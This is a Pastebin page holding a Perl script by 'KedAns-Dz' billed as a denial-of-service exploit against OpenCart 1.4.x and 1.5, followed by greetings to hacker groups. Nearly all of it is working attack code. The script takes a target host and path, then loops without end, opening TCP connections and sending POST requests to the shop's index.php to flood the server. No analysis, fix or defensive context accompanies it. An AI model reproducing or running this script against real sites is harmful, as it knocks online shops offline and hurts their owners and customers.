Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # ********* In The name of Allah ************
- ###
- # Title : OpenCart 1.4.x 1.5 DDoS Exploit
- # Author : KedAns-Dz
- # E-mail : [email protected]
- # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
- # Twitter page : twitter.com/kedans
- # platform : php
- # Impact : Remote DDos Attack (D.O.S Server)
- # Tested on : Windows XP SP3 Français
- # Target : OpenCart 1.4.x 1.5
- ###
- # Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
- # ------------
- # ********* In The name of Allah ************
- system("title KedAns-Dz");
- system("color c0");
- system("cls");
- sleep(1);
- # ** Allah Akbar **
- use Socket;
- if (@ARGV < 2) { &usage }
- $rand=rand(10);
- $host = $ARGV[0];
- $dir = $ARGV[1];
- $host =~ s/(http:\/\/)//eg;
- for ($i=0; $i<10; $i--)
- {
- $user="vb".$rand.$i;
- $data = "s="
- ;
- $len = length $data;
- $foo = "POST ".$dir."index.php HTTP/1.1\r\n".
- "Accept: */*\r\n".
- "Accept-Language: en-gb\r\n".
- "Content-Type: application/x-www-form-urlencoded\r\n".
- "Accept-Encoding: gzip, deflate\r\n".
- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
- "Host: $host\r\n".
- "Content-Length: $len\r\n".
- "Connection: Keep-Alive\r\n".
- "Cache-Control: no-cache\r\n\r\n".
- "$data";
- my $port = "80";
- my $proto = getprotobyname('tcp');
- socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
- connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
- send(SOCKET,"$foo", 0);
- syswrite STDOUT, "+" ;
- }
- print "\n\n";
- system('ping $host');
- sub usage {
- print "\tusage: \n";
- print "\t$0 <host> </dir/>\n";
- print "\Ex: $0 127.0.0.1 /shop/\n";
- print "\Ex2: $0 target.com /\n\n";
- exit();
- };
- # ** In The Peace of Allah **
- #================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
- # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
- # Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
- # Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
- # Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
- # Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
- # Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
- # Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
- # www.packetstormsecurity.org * bugsearch.net * 1337day.com * exploit-id.com
- # www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
- #================================================================================================
Advertisement
Add Comment
Please, Sign In to add comment